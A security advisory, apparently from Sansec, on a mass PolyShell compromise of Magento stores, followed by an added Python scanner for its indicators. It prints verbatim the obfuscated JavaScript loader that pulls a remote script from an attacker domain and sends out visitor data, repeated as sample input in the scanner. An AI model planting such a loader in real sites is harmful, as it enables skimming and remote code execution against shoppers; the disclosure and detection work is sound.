Mass PolyShell attack wave hits 214 stores in one hour
by Sansec Forensics Team
Published in Threat Research − March 30, 2026
Sansec detected 214 stores compromised in a single hour as attackers exploit the PolyShell vulnerability at scale. The attack injects obfuscated JavaScript from the freshly registered domain lanhd6549tdhse.top. New victims are still coming in every minute.

Sansec is tracking a mass exploitation wave of the PolyShell vulnerability that hit 214 online stores within a single hour today. The attacks are ongoing: new victims appear every minute.
None of the compromised stores are Sansec customers. Sansec Shield has been blocking PolyShell attacks since March 16th.

What's being injected
After gaining access through PolyShell, attackers inject obfuscated JavaScript into CMS pages and static blocks. The script uses localStorage for persistence and loads an external payload from lanhd6549tdhse.top:
<script type="application/javascript">
(function(){
var id='136c1e07507f4a97';
var store=localStorage.getItem(id);
if(store){
var e=document.createElement('a');
e.setAttribute('onclick',atob(store));
e.click();
localStorage.removeItem(id)
}
}());
(function(){
var d=document;
var s=d.createElement('script');
s.src=atob('aHR0cHM6Ly9sYW5oZDY1NDl0ZGhzZS50b3AvS1p0QnNjZ2I/JnNlX3JlZmVycmVyPQ==')
+ encodeURIComponent(d.referrer)
+ '&default_keyword=' + encodeURIComponent(d.title)
+ '&' + window.location.search.replace('?','&')
+ '&frm=script';
if(d.currentScript){
d.currentScript.parentNode.insertBefore(s, d.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
}());
</script>
The base64 string decodes to https://lanhd6549tdhse.top/KZtBscgb?&se_referrer=. The script fingerprints every visitor by collecting referrer, page title, and query parameters. The domain was registered just four days ago and Sansec is currently the only vendor on VirusTotal that flags it as malicious.
The first stage checks localStorage for a previously stored payload (keyed by 136c1e07507f4a97). If found, it executes the payload via a synthetic click event and removes it. This lets the attacker persist malicious behavior across page loads without re-fetching from the external server.
The attack chain
These 214 compromises follow the same pattern Sansec has documented over the past two weeks:
- Attacker uploads a PHP webshell via the PolyShell vulnerability
- Webshell drops accesson.php backdoors across multiple directories
- Attacker injects the JavaScript loader into CMS content
The speed of this wave (214 stores in 60 minutes) shows that the attackers have fully automated the exploitation chain from initial upload to JavaScript injection.
Indicators of compromise
| Type | Value |
|---|---|
| Loader domain | lanhd6549tdhse.top |
| Loader URL | https://lanhd6549tdhse.top/KZtBscgb |
| localStorage key | 136c1e07507f4a97 |
| Backdoor filename | accesson.php |
| Backdoor beacon | 8194460 (result of 409723*20) |
Use a specialized ecommerce scanner like eComscan to check your store for these and other indicators of compromise. Manual searches only catch known IOCs, while eComscan detects the full range of PolyShell payloads, backdoors, and injected scripts.
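The following script is an added example written for this post; it is not Sansec's eComscan and not code from the advisory. It covers the two checks described above: it takes exported CMS page and static block content (assumed to come from the `cms_page.content` and `cms_block.content` columns), decodes every `atob('...')` literal so that a loader URL hidden in base64 is matched against the loader domain, flags the `136c1e07507f4a97` localStorage key and the localStorage-to-onclick persistence stage, and walks a webroot for `accesson.php`. The CMS block and the throwaway webroot it scans are constructed sample data.

```python
"""Scan exported Magento CMS content and a webroot for the PolyShell loader IOCs.

Added example, not Sansec's eComscan and not code from the advisory. It assumes
the cms_page.content / cms_block.content rows have been exported to Python
strings and that the webroot is a local directory; the sample block below is
constructed from the loader shown in the article.
"""
import base64
import os
import re
import tempfile

# Indicators listed in the advisory
LOADER_DOMAIN = "lanhd6549tdhse.top"
LOCALSTORAGE_KEY = "136c1e07507f4a97"
BACKDOOR_FILENAME = "accesson.php"

# atob('<base64>') literals; atob(variable) deliberately does not match
ATOB_RE = re.compile(r"""atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
# Host part of any http(s) URL found in a decoded literal
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Persistence stage: onclick attribute built from atob(<localStorage value>)
PERSIST_RE = re.compile(r"""setAttribute\(\s*['"]onclick['"]\s*,\s*atob\(""")


def decode_atob_literals(js: str) -> list[str]:
    """Decode every base64 literal passed to atob() in the given JavaScript."""
    decoded = []
    for b64 in ATOB_RE.findall(js):
        try:
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue  # not valid base64, skip it
    return decoded


def scan_cms_content(name: str, html: str) -> list[str]:
    """Return a list of findings for one CMS page or static block."""
    findings = []
    for text in decode_atob_literals(html):
        for host in HOST_RE.findall(text):
            if host == LOADER_DOMAIN or host.endswith("." + LOADER_DOMAIN):
                findings.append(f"{name}: loader URL hidden in atob(): {text}")
    if LOCALSTORAGE_KEY in html:
        findings.append(f"{name}: localStorage key {LOCALSTORAGE_KEY}")
    if "localStorage.getItem(" in html and PERSIST_RE.search(html):
        findings.append(f"{name}: localStorage -> onclick -> click() persistence stage")
    return findings


def scan_webroot(root: str) -> list[str]:
    """Return the path of every accesson.php under root (the dropped backdoor)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname == BACKDOOR_FILENAME:
                hits.append(os.path.join(dirpath, fname))
    return sorted(hits)


# Constructed sample: the loader from the article pasted into a CMS block
SAMPLE_CMS_BLOCK = """<p>Free shipping on orders over $50</p>
<script type="application/javascript">
(function(){var id='136c1e07507f4a97';var store=localStorage.getItem(id);
if(store){var e=document.createElement('a');e.setAttribute('onclick',atob(store));
e.click();localStorage.removeItem(id)}}());
(function(){var d=document;var s=d.createElement('script');
s.src=atob('aHR0cHM6Ly9sYW5oZDY1NDl0ZGhzZS50b3AvS1p0QnNjZ2I/JnNlX3JlZmVycmVyPQ==')
+encodeURIComponent(d.referrer)+'&frm=script';
d.getElementsByTagName('head')[0].appendChild(s);}());
</script>"""


def build_sample_webroot() -> str:
    """Create a throwaway webroot with two dropped backdoors (constructed data)."""
    root = tempfile.mkdtemp(prefix="polyshell-demo-")
    for rel in ("pub/media/accesson.php", "var/accesson.php", "pub/index.php"):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("<?php // placeholder\n")
    return root


if __name__ == "__main__":
    for line in scan_cms_content("cms_block#7", SAMPLE_CMS_BLOCK):
        print(line)
    for path in scan_webroot(build_sample_webroot()):
        print("backdoor:", path)
```

Decoding the `atob()` literals is what makes the domain match work: a plain grep for `lanhd6549tdhse.top` over the database misses the loader because the domain only exists in base64. The persistence check is deliberately pattern-based rather than keyed to the `136c1e07507f4a97` string, so it still fires if the attacker rotates the key in a later wave.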
Recommendations
- Block attacks: Deploy Sansec Shield to block PolyShell exploitation attempts in real-time
- Scan for compromise: Run eComscan to detect uploaded webshells, backdoors, and injected JavaScript
For full technical details on the PolyShell vulnerability and all known payloads, see our main PolyShell advisory.
Read more
- Magento PolyShell: unrestricted file upload in Magento and Adobe Commerce
- Novel WebRTC skimmer bypasses security controls at $100+ billion car maker
- Claude finds 353 zero-days on Packagist
- SessionReaper attacks have started, 3 in 5 stores still vulnerable
- SessionReaper, unauthenticated RCE in Magento & Adobe Commerce (CVE-2025-54236)